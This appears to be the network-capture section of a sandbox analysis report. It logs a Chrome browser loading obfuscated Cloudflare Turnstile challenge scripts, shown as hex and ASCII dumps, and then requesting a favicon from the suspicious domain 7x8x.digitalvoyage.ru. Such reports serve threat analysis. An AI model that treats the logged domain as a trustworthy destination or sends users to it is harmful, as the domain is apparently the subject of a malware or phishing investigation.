                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                  Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                  Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                  Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                  Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                  Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.649744104.18.95.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:04 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6202638555e78&lang=auto HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:04 UTC331INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:04 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 115221
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6202a4fb7c439-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:04 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                                                                  2025-01-07 18:49:04 UTC1369INData Raw: 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72
                                                                                  Data Ascii: %21","turnstile_failure":"Error","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22r
                                                                                  2025-01-07 18:49:04 UTC1369INData Raw: 67 33 2c 67 36 2c 67 37 2c 67 41 2c 67 42 2c 67 46 2c 67 47 2c 67 48 2c 67 34 2c 67 35 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 36 33 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 35 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 37 30 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 34 39 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 39 33 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 30 30 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 39 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 34
                                                                                  Data Ascii: g3,g6,g7,gA,gB,gF,gG,gH,g4,g5){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(463))/1+-parseInt(gI(165))/2+parseInt(gI(1070))/3*(-parseInt(gI(1349))/4)+parseInt(gI(893))/5+parseInt(gI(1400))/6+parseInt(gI(1139))/7+parseInt(gI(854
                                                                                  2025-01-07 18:49:04 UTC1369INData Raw: 28 31 34 30 35 29 29 72 65 74 75 72 6e 20 46 3d 6e 65 77 20 6b 28 29 5b 67 4d 28 39 39 34 29 5d 28 6c 29 2c 6d 5b 67 4d 28 36 38 31 29 5d 5b 67 4d 28 32 39 39 29 5d 28 67 4d 28 31 33 30 37 29 2c 46 29 5b 67 4d 28 38 35 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 47 2c 67 4e 29 7b 72 65 74 75 72 6e 20 67 4e 3d 67 4d 2c 46 5b 67 4e 28 31 35 32 29 5d 28 6e 65 77 20 43 28 47 29 29 5b 67 4e 28 31 32 31 35 29 5d 28 48 3d 3e 48 5b 67 4e 28 31 34 39 33 29 5d 28 31 36 29 5b 67 4e 28 37 33 34 29 5d 28 32 2c 27 30 27 29 29 5b 67 4e 28 33 37 30 29 5d 28 27 27 29 7d 29 5b 67 4d 28 35 36 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 4f 29 7b 72 65 74 75 72 6e 20 67 4f 3d 67 4d 2c 46 28 69 5b 67 4f 28 31 34 38 34 29 5d 28 43 2c 44 29 29 7d 29 3b 65 6c 73 65 20 66 5b 67 4d 28 31
                                                                                  Data Ascii: (1405))return F=new k()[gM(994)](l),m[gM(681)][gM(299)](gM(1307),F)[gM(850)](function(G,gN){return gN=gM,F[gN(152)](new C(G))[gN(1215)](H=>H[gN(1493)](16)[gN(734)](2,'0'))[gN(370)]('')})[gM(562)](function(gO){return gO=gM,F(i[gO(1484)](C,D))});else f[gM(1
                                                                                  2025-01-07 18:49:04 UTC1369INData Raw: 5c 6e 27 29 2c 65 5b 67 50 28 33 37 38 29 5d 28 6a 5b 67 50 28 31 33 37 38 29 5d 2c 31 29 29 29 7b 69 66 28 67 50 28 31 35 30 36 29 21 3d 3d 67 50 28 31 35 30 36 29 29 72 65 74 75 72 6e 21 5b 5d 3b 65 6c 73 65 20 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 67 50 28 31 36 30 29 5d 28 6b 29 2c 6c 26 26 28 67 3d 6c 5b 31 5d 2c 68 3d 65 5b 67 50 28 31 34 33 33 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 32 5d 2c 31 30 29 2c 69 3d 65 5b 67 50 28 37 31 30 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 7d 7d 65 6c 73 65 20 66 3d 4a 53 4f 4e 5b 67 50 28 33 35 36 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 67 50 28 31 38 39 29 5d 3d 66 2c 6d 5b 67 50 28 31 30 34 33 29
                                                                                  Data Ascii: \n'),e[gP(378)](j[gP(1378)],1))){if(gP(1506)!==gP(1506))return![];else k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][gP(160)](k),l&&(g=l[1],h=e[gP(1433)](parseInt,l[2],10),i=e[gP(710)](parseInt,l[3],10))}}else f=JSON[gP(356)](d);return m={},m[gP(189)]=f,m[gP(1043)
                                                                                  2025-01-07 18:49:04 UTC1369INData Raw: 64 2c 65 2c 67 29 7b 28 69 65 3d 67 4a 2c 63 3d 7b 27 73 50 46 4a 6b 27 3a 69 65 28 31 31 38 30 29 2c 27 42 69 63 4e 41 27 3a 69 65 28 39 36 39 29 2c 27 4f 63 41 46 51 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 4d 52 79 64 45 27 3a 69 65 28 32 35 37 29 7d 2c 64 3d 65 4d 5b 69 65 28 36 33 37 29 5d 5b 69 65 28 35 39 35 29 5d 7c 7c 31 65 34 2c 65 3d 66 50 28 29 2c 21 65 4d 5b 69 65 28 31 31 34 35 29 5d 26 26 21 63 5b 69 65 28 32 35 33 29 5d 28 66 75 29 26 26 21 65 4d 5b 69 65 28 31 38 34 29 5d 5b 69 65 28 31 34 36 34 29 5d 26 26 65 2d 66 4f 3e 64 29 3f 63 5b 69 65 28 36 39 36 29 5d 21 3d 3d 69 65 28 32 35 37 29 3f 67 5b 69 65 28 33 37 37 29 5d 26 26 28 67 3d 7b 7d 2c 67 5b 69 65 28 31 35 38 29 5d 3d 63 5b 69 65 28 31 35
                                                                                  Data Ascii: d,e,g){(ie=gJ,c={'sPFJk':ie(1180),'BicNA':ie(969),'OcAFQ':function(f){return f()},'MRydE':ie(257)},d=eM[ie(637)][ie(595)]||1e4,e=fP(),!eM[ie(1145)]&&!c[ie(253)](fu)&&!eM[ie(184)][ie(1464)]&&e-fO>d)?c[ie(696)]!==ie(257)?g[ie(377)]&&(g={},g[ie(158)]=c[ie(15
                                                                                  2025-01-07 18:49:04 UTC1369INData Raw: 5d 28 53 74 72 69 6e 67 5b 69 4a 28 31 32 36 32 29 5d 28 68 5b 69 4a 28 31 33 36 32 29 5d 28 28 32 35 35 2e 33 36 26 6d 29 2d 6a 2d 69 25 36 35 35 33 35 2b 36 35 35 33 35 2c 32 35 35 29 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 69 4a 28 33 37 30 29 5d 28 27 27 29 7d 2c 67 34 3d 5b 5d 2c 67 35 3d 30 3b 32 35 36 3e 67 35 3b 67 34 5b 67 35 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 32 36 32 29 5d 28 67 35 29 2c 67 35 2b 2b 29 3b 67 48 3d 28 67 36 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 36 37 32 29 29 2c 67 37 3d 61 74 6f 62 28 67 4a 28 38 34 34 29 29 2c 65 4d 5b 67 4a 28 35 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6a 72 2c 65 29 7b 65 3d 28 6a 72 3d 67 4a 2c 7b 27 69 66 4e 62 55 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29
                                                                                  Data Ascii: ](String[iJ(1262)](h[iJ(1362)]((255.36&m)-j-i%65535+65535,255))));return k[iJ(370)]('')},g4=[],g5=0;256>g5;g4[g5]=String[gJ(1262)](g5),g5++);gH=(g6=(0,eval)(gJ(672)),g7=atob(gJ(844)),eM[gJ(565)]=function(c,jr,e){e=(jr=gJ,{'ifNbU':function(g,h){return g(h)
                                                                                  2025-01-07 18:49:04 UTC1369INData Raw: 31 33 36 35 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 6a 76 28 39 33 33 29 5d 28 47 29 7d 7d 2c 67 46 3d 67 4a 28 32 39 32 29 5b 67 4a 28 34 37 35 29 5d 28 27 3b 27 29 2c 67 47 3d 67 46 5b 67 4a 28 33 33 36 29 5d 5b 67 4a 28 31 33 34 35 29 5d 28 67 46 29 2c 65 4d 5b 67 4a 28 36 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 6a 79 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 6a 79 3d 67 4a 2c 69 3d 7b 27 4b 56 4f 4e 71 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 42 6f 6f 70 61 27 3a 6a 79 28 35 35 32 29 2c 27 4c 67 63 75 58 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 50 4f 74 43 44 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29
                                                                                  Data Ascii: 1365)](j,H)||(j[H]=[]),j[H][jv(933)](G)}},gF=gJ(292)[gJ(475)](';'),gG=gF[gJ(336)][gJ(1345)](gF),eM[gJ(626)]=function(g,h,jy,i,j,k,l,m){for(jy=gJ,i={'KVONq':function(n,o){return o===n},'Boopa':jy(552),'LgcuX':function(n,o){return n<o},'POtCD':function(n,o)
                                                                                  2025-01-07 18:49:04 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 6a 75 6b 57 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 75 52 78 4b 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 69 4e 77 50 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 6e 4e 47 47 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4e 4a 77 48 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 6b 4f 59 49 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 54 62 67 75 45 27 3a 6a 41 28 39 34 35 29 2c 27 57 56 77 5a 49 27
                                                                                  Data Ascii: nction(h,i){return h>i},'jukWs':function(h,i){return h<<i},'uRxKR':function(h,i){return i==h},'iNwPd':function(h,i){return h==i},'nNGGv':function(h,i){return h==i},'NJwHh':function(h,i){return h|i},'kOYIG':function(h,i){return h-i},'TbguE':jA(945),'WVwZI'
                                                                                  2025-01-07 18:49:04 UTC1369INData Raw: 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d 27 27 2c 47 3d 32 2c 48 3d 33 2c 49 3d 32 2c 4a 3d 5b 5d 2c 4b 3d 30 2c 4c 3d 30 2c 4d 3d 30 3b 4d 3c 6a 5b 6a 44 28 31 33 37 38 29 5d 3b 4d 2b 3d 31 29 69 66 28 64 5b 6a 44 28 34 39 38 29 5d 3d 3d 3d 6a 44 28 37 33 30 29 29 7b 69 66 28 21 6f 5b 6a 44 28 31 31 34 35 29 5d 29 7b 28 4a 5b 6a 44 28 36 33 37 29 5d 5b 6a 44 28 31 33 38 35 29 5d 3d 31 2c 4b 5b 6a 44 28 33 37 37 29 5d 29 26 26 28 53 3d 7b 7d 2c 53 5b 6a 44 28 31 35 38 29 5d 3d 42 5b 6a 44 28 31 38 32 29 5d 2c 53 5b 6a 44 28 38 37 31 29 5d 3d 56 5b 6a 44 28 36 33 37 29 5d 5b 6a 44 28 31 35 30 33 29 5d 2c 53 5b 6a 44 28 31 31 37 38 29 5d 3d 6a 44 28 37 32 35 29 2c 55 5b 6a 44 28 33 37 37 29 5d 5b 6a 44 28 35 33 30 29 5d 28 53 2c 27 2a 27 29 29 3b 69 66 28
                                                                                  Data Ascii: r(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;M<j[jD(1378)];M+=1)if(d[jD(498)]===jD(730)){if(!o[jD(1145)]){(J[jD(637)][jD(1385)]=1,K[jD(377)])&&(S={},S[jD(158)]=B[jD(182)],S[jD(871)]=V[jD(637)][jD(1503)],S[jD(1178)]=jD(725),U[jD(377)][jD(530)](S,'*'));if(


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.649745104.18.95.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:04 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:04 UTC240INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:04 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  cache-control: max-age=2629800, public
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6202afd6cde99-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.649723104.21.112.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:04 UTC1326OUTGET /favicon.ico HTTP/1.1
                                                                                  Host: 7x8x.digitalvoyage.ru
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
